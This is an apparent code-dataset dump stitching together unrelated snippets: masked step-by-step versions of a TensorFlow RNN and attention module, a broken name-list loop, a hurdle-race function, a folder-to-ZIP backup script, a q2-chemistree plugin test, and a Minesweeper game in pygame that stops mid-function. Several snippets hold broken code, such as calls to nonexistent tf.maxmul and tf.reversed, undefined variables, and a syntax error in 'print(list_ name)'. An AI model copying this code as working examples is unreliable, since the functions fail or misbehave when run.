tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n =True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\n<mask token>\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n =True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\ndef bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw = gru_cell(x, h_fw, 'fw_gru_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw = gru_cell(x, h_bw, 'bw_gru_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n h = tf.concat((h_fw, h_bw), 1)\n return X, h\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n =True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\ndef bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw = gru_cell(x, h_fw, 'fw_gru_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw = gru_cell(x, h_bw, 'bw_gru_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n h = tf.concat((h_fw, h_bw), 1)\n return X, h\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n =True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\ndef _dec_attn(h, d_hsW, d_hs):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), d_hsW, transpose_b=\n True), [1])\n a = tf.nn.softmax(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), d_hs), [1])\n return ctx\n",
"step-5": "import tensorflow as tf\nfrom rnn_cells import gru_cell, lstm_cell\nfrom tensorflow.python.ops import rnn\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [ts[i] if ps[i] is None else ps[i] for i in range(len(ps))]\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n # forward pass\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n # backward pass\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n # stack outputs\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n # concat outputs and states \n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\ndef bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):\n with tf.variable_scope(scope) as sc:\n # forward pass\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw = gru_cell(x, h_fw, 'fw_gru_cell')\n hs_fw.append(h_fw)\n # backward pass\n hs_bw = []\n for idx, x in enumerate(reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw = gru_cell(x, h_bw, 'bw_gru_cell')\n hs_bw.append(h_bw)\n # stack outputs\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n # concat outputs and states \n X = tf.concat((hs_fw, hs_bw), 2)\n h = tf.concat((h_fw, h_bw), 1)\n return X, h\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n # handle the stack of lstm_cells\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope=\"cell_%d\" % i)\n # add residual connections after specified depth\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n # hande the stack of lstm_cells\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope=\"cell_%d\" % i)\n # add residual connections after specified depth\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\ndef _luong_attn(h, e_out_W, e_out):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])\n a = tf.nn.softmax(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable(\"w_q_attn\", [units, units], initializer=tf.random_normal_initializer(stddev=0.02))\n v = tf.get_variable(\"attn_v\", [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])\n score = tf.cond(time > 0, lambda: tf.exp(score)/(score_sum+1e-12), lambda: tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\ndef _dec_attn(h, d_hsW, d_hs):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), d_hsW, transpose_b=True), [1])\n a = tf.nn.softmax(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), d_hs), [1])\n return ctx",
"step-ids": [
6,
7,
8,
9,
12
]
}
|
[
6,
7,
8,
9,
12
] |
name_list =[ ]
a = 1
for a in range(1,33):
name = input("请输入要加入列表的名字:")
name_list.append("name")
print(name)
print(list_ name)
|
normal
|
{
"blob_id": "3f7dddcfde9d33f30f00156fc41700da2692afc3",
"index": 2006,
"step-1": "name_list =[ ]\na = 1\nfor a in range(1,33):\n name = input(\"请输入要加入列表的名字:\")\n name_list.append(\"name\")\n print(name)\nprint(list_ name)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
myfavoritenumber = 5
print(myfavoritenumber)
x = 5
x = x + 1
print(x)
x, y, z = 1, 2, 3
print(x, y, z)
|
normal
|
{
"blob_id": "e6c7b15e5b42cfe6c5dec2eaf397b67afd716ebd",
"index": 3858,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(myfavoritenumber)\n<mask token>\nprint(x)\n<mask token>\nprint(x, y, z)\n",
"step-3": "myfavoritenumber = 5\nprint(myfavoritenumber)\nx = 5\nx = x + 1\nprint(x)\nx, y, z = 1, 2, 3\nprint(x, y, z)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Complete the hurdleRace function below.
def hurdleRace(k, height):
if k < max(height):
return max(height) - k
return 0
print(hurdleRace(2, [2,5,4,5,2]))
|
normal
|
{
"blob_id": "c139cbc3e693d75ad196e10257ff3028aa835709",
"index": 428,
"step-1": "<mask token>\n",
"step-2": "def hurdleRace(k, height):\n if k < max(height):\n return max(height) - k\n return 0\n\n\n<mask token>\n",
"step-3": "def hurdleRace(k, height):\n if k < max(height):\n return max(height) - k\n return 0\n\n\nprint(hurdleRace(2, [2, 5, 4, 5, 2]))\n",
"step-4": "# Complete the hurdleRace function below.\ndef hurdleRace(k, height):\n if k < max(height):\n return max(height) - k\n return 0\n\nprint(hurdleRace(2, [2,5,4,5,2]))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 13 14:10:15 2018
9.5 项目:将一个文件夹备份到一个 ZIP 文件
@author: NEVERGUVEIP
"""
#! python3
import zipfile,os
def backupToZip(folder):
#backup the entire contents of 'folder' into a ZIP file
folder = os.path.abspath(folder)
os.chdir(folder)
#figure out the filename this code should use based on
#what files already exist.
number = 1
#从1循环检查文件名存不存在,_1.zip,_2.zip,,防止备份以前的备份文件
while True:
zipFilename = os.path.basename(folder) +'_'+str(number)+'.zip'
if not os.path.exists(zipFilename):
break
number = number +1
#creat the zip file
print('creating %s...'%(zipFilename))
backupZip = zipfile.ZipFile(zipFilename,'w')
#TODO: walk the entire folder tree and compress the files in each folder.
for foldername,subfolders,filenames in os.walk(folder):#
print('adding files in %s...'%(foldername))
#add the current folder to the zip file.
backupZip.write(foldername)
#add all the files in this folder to the ZIP file.
for filename in filenames:
newBase = os.path.basename(folder)+'_'
if filename.startswith(newBase) and filename.endswith('.zip'):
continue# don't backup the backup ZIP files
backupZip.write(os.path.join(foldername,filename))
backupZip.close()
print('......Done......')
#backupToZip(r'C:\Users\NEVERGUVEIP\Documents\GitHub\python_test')
backupToZip('.')
|
normal
|
{
"blob_id": "7af19f69e6c419649a5999f594118ad13833a537",
"index": 7398,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef backupToZip(folder):\n folder = os.path.abspath(folder)\n os.chdir(folder)\n number = 1\n while True:\n zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'\n if not os.path.exists(zipFilename):\n break\n number = number + 1\n print('creating %s...' % zipFilename)\n backupZip = zipfile.ZipFile(zipFilename, 'w')\n for foldername, subfolders, filenames in os.walk(folder):\n print('adding files in %s...' % foldername)\n backupZip.write(foldername)\n for filename in filenames:\n newBase = os.path.basename(folder) + '_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue\n backupZip.write(os.path.join(foldername, filename))\n backupZip.close()\n print('......Done......')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef backupToZip(folder):\n folder = os.path.abspath(folder)\n os.chdir(folder)\n number = 1\n while True:\n zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'\n if not os.path.exists(zipFilename):\n break\n number = number + 1\n print('creating %s...' % zipFilename)\n backupZip = zipfile.ZipFile(zipFilename, 'w')\n for foldername, subfolders, filenames in os.walk(folder):\n print('adding files in %s...' % foldername)\n backupZip.write(foldername)\n for filename in filenames:\n newBase = os.path.basename(folder) + '_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue\n backupZip.write(os.path.join(foldername, filename))\n backupZip.close()\n print('......Done......')\n\n\nbackupToZip('.')\n",
"step-4": "<mask token>\nimport zipfile, os\n\n\ndef backupToZip(folder):\n folder = os.path.abspath(folder)\n os.chdir(folder)\n number = 1\n while True:\n zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'\n if not os.path.exists(zipFilename):\n break\n number = number + 1\n print('creating %s...' % zipFilename)\n backupZip = zipfile.ZipFile(zipFilename, 'w')\n for foldername, subfolders, filenames in os.walk(folder):\n print('adding files in %s...' % foldername)\n backupZip.write(foldername)\n for filename in filenames:\n newBase = os.path.basename(folder) + '_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue\n backupZip.write(os.path.join(foldername, filename))\n backupZip.close()\n print('......Done......')\n\n\nbackupToZip('.')\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 13 14:10:15 2018\n9.5 项目:将一个文件夹备份到一个 ZIP 文件 \n\n@author: NEVERGUVEIP\n\"\"\"\n#! python3\n\nimport zipfile,os\n\ndef backupToZip(folder):\n #backup the entire contents of 'folder' into a ZIP file\n \n folder = os.path.abspath(folder)\n os.chdir(folder)\n #figure out the filename this code should use based on\n #what files already exist. \n number = 1 \n #从1循环检查文件名存不存在,_1.zip,_2.zip,,防止备份以前的备份文件\n while True:\n zipFilename = os.path.basename(folder) +'_'+str(number)+'.zip'\n if not os.path.exists(zipFilename):\n break\n number = number +1\n \n \n #creat the zip file\n print('creating %s...'%(zipFilename))\n backupZip = zipfile.ZipFile(zipFilename,'w')\n \n #TODO: walk the entire folder tree and compress the files in each folder. \n\n for foldername,subfolders,filenames in os.walk(folder):#\n \n print('adding files in %s...'%(foldername)) \n #add the current folder to the zip file.\n backupZip.write(foldername)\n #add all the files in this folder to the ZIP file.\n for filename in filenames:\n newBase = os.path.basename(folder)+'_'\n if filename.startswith(newBase) and filename.endswith('.zip'):\n continue# don't backup the backup ZIP files\n backupZip.write(os.path.join(foldername,filename))\n \n backupZip.close() \n print('......Done......')\n\n#backupToZip(r'C:\\Users\\NEVERGUVEIP\\Documents\\GitHub\\python_test')\nbackupToZip('.')\n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2018, q2-chemistree development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
from q2_chemistree.plugin_setup import plugin as chemistree_plugin
class PluginSetupTests(unittest.TestCase):
def test_plugin_setup(self):
self.assertEqual(chemistree_plugin.name, 'chemistree')
|
normal
|
{
"blob_id": "4296dc5b79fd1d2c872eb1115beab52a0f067423",
"index": 4816,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PluginSetupTests(unittest.TestCase):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PluginSetupTests(unittest.TestCase):\n\n def test_plugin_setup(self):\n self.assertEqual(chemistree_plugin.name, 'chemistree')\n",
"step-4": "import unittest\nfrom q2_chemistree.plugin_setup import plugin as chemistree_plugin\n\n\nclass PluginSetupTests(unittest.TestCase):\n\n def test_plugin_setup(self):\n self.assertEqual(chemistree_plugin.name, 'chemistree')\n",
"step-5": "# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2018, q2-chemistree development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport unittest\n\nfrom q2_chemistree.plugin_setup import plugin as chemistree_plugin\n\n\nclass PluginSetupTests(unittest.TestCase):\n\n def test_plugin_setup(self):\n self.assertEqual(chemistree_plugin.name, 'chemistree')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
import random
import pygame
import pygame.locals
import time
# TODO high scores, difficulties
# Absolutes (in pixels where not otherwise stated)
CELL_SIDE_LENGTH = 40 # Side length of each cell
CELL_MARGIN = 2 # Gap between cells
GRID_HEIGHT = 10 # How many cells are in the grid
GRID_WIDTH = 10
X_BOARD_MARGIN = 50 # Gap between grid and sides of board
Y_BOARD_MARGIN = 75
MENU_MARGIN = 100 # Amount of space on the right dedicated to the menu
DIFFICULTY = 0.1 # Ratio of bombs (10% by default)
FPS = 30 # frames per second (window refresh speed)
# Relatives (so board size can easily be changed)
NUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY) # Default about 10% of the board is mines
WINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2)
WINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN
# R G B (not all used, but kept so theme can easily be changed)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
MIDGREEN = (40, 190, 40)
CYAN = (0, 255, 255)
BLUE = (0, 0, 255)
DARKBLUE = (20, 20, 60)
MAGENTA = (255, 0, 255)
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GRAY = (200, 200, 200)
BG_COLOR = DARKBLUE # Background color
CELL_COLOR = GRAY # Universal cover color
HIGHLIGHT_COLOR = CYAN # Cell the cursor is currently hovering over
FLAG_COLOR = MIDGREEN
# Symbols
FLAG = 'flag'
MINE = 'mine'
CLEAR = 'clear'
class Game:
def __init__(self):
pygame.init()
global CLOCK, SURFACE
CLOCK = pygame.time.Clock()
SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
self.mouse_x = 0 # Stores x-coordinate of mouse event
self.mouse_y = 0 # Stores y-coordinate of mouse event
pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')
self.board = self.get_board()
self.revealed_cells = self.generate_data(False)
self.flags = self.generate_data(False)
self.questionmarks = self.generate_data(False)
self.game_over = False
self.timer = Stopwatch()
SURFACE.fill(BG_COLOR)
def main(self):
while True:
left_click = False
right_click = False
SURFACE.fill(BG_COLOR)
self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)
self.create_menu()
font = pygame.font.SysFont("times new roman", 25)
# Timer (will be used to implement high scores)
self.timer.start()
t1 = self.timer.get_seconds()
label = font.render(str(t1), 1, MAGENTA)
SURFACE.blit(label, (50, 50))
# Mouse event handling
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
pygame.quit()
sys.exit() # Even if the window closes, we still need to manually stop the processes
elif event.type == pygame.locals.MOUSEMOTION:
self.mouse_x, self.mouse_y = event.pos # For hovering info
elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1: # Left click
self.mouse_x, self.mouse_y = event.pos
print(self.mouse_x, self.mouse_y)
left_click = True
elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3: # Right click
self.mouse_x, self.mouse_y = event.pos
right_click = True
# If user decided to start over, reinitialize game
if self.game_over and right_click:
self.board = self.get_board()
self.revealed_cells = self.generate_data(False)
self.flags = self.generate_data(False)
self.questionmarks = self.generate_data(False)
self.game_over = False
self.timer = Stopwatch()
right_click = False
# TODO tweak spacing on text
if self.game_over:
self.timer.pause()
score = self.timer.get_seconds()
a_x = X_BOARD_MARGIN + ((GRID_WIDTH / 4) * CELL_SIDE_LENGTH)
b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN)
font = pygame.font.SysFont("times new roman", 25)
if win:
label = font.render('Congratulations, you won!', 1, GREEN)
SURFACE.blit(label, (a_x - 75, b_y))
label = font.render('Score: ' + str(score), 1, GREEN)
SURFACE.blit(label, (a_x + 200, b_y))
else:
label = font.render('GAME OVER', 1, RED)
SURFACE.blit(label, (a_x + 10, b_y))
label = font.render('Press RIGHT mouse button', 1, YELLOW)
SURFACE.blit(label, (a_x - 50, b_y + 25))
cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)
if cell_x is not None and cell_y is not None: # If mouse is hovering over a cell during mouse event
# Highlight cell
if not self.revealed_cells[cell_x][cell_y] and not self.game_over:
self.highlight_cell(cell_x, cell_y)
# Digging somewhere
if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over:
# So you can't accidentally click a flagged/question mark space
if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]:
self.flags[cell_x][cell_y] = False
if self.board[cell_x][cell_y][0] == MINE: # If you dig a mine, reveal all cells & game over
self.revealed_cells = self.generate_data(True)
self.game_over = True
elif self.board[cell_x][cell_y][0] == CLEAR: # If you dig a clear cell, reveal that cell
self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks)
else:
self.revealed_cells[cell_x][cell_y] = True # Set the cell as revealed
# Redraw board after mouse event
self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)
# Placing a flag- if flag already there, change flag to question mark.
# If question mark already there, turn to nothing. If nothing there, turn on flag
if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over:
if self.flags[cell_x][cell_y]:
self.flags[cell_x][cell_y] = False
self.questionmarks[cell_x][cell_y] = True
elif self.questionmarks[cell_x][cell_y]:
self.questionmarks[cell_x][cell_y] = False
self.flags[cell_x][cell_y] = False
else:
self.flags[cell_x][cell_y] = True
self.questionmarks[cell_x][cell_y] = False
# Flag is drawn in this method call
self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)
# This block decides whether or not the player has won yet after a mouse event
win = True
for x in range(GRID_WIDTH): # If a cell is a mine and not flagged, or if a cell is clear
for y in range(GRID_HEIGHT): # but not revealed, then the game is not yet over
if (self.board[x][y][0] == MINE and not self.flags[x][y]) or (
self.board[x][y][0] != MINE and not self.revealed_cells[x][y]):
win = False
if win:
self.game_over = True
# Redraw the screen and wait for clock tick
pygame.display.update()
CLOCK.tick(FPS)
@staticmethod
def get_board():
icons = []
mines = 0
# Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay
# Making randomized array
for x in range(GRID_WIDTH):
for y in range(GRID_HEIGHT):
if mines < NUM_MINES:
icons.append((MINE, RED))
mines += 1
else:
icons.append((CLEAR, WHITE))
random.shuffle(icons)
# Create static under-board
board = []
for x in range(GRID_WIDTH):
column = []
for y in range(GRID_HEIGHT):
column.append(icons[0])
del icons[0] # so the next icon[0] is the one after this
board.append(column)
# This block determines how many mines are around each cell, and adds the number to the board's array
for x in range(GRID_WIDTH):
for y in range(GRID_HEIGHT):
mines = 0
if x > 0:
if y > 0: # If not on the left edge AND not on top edge
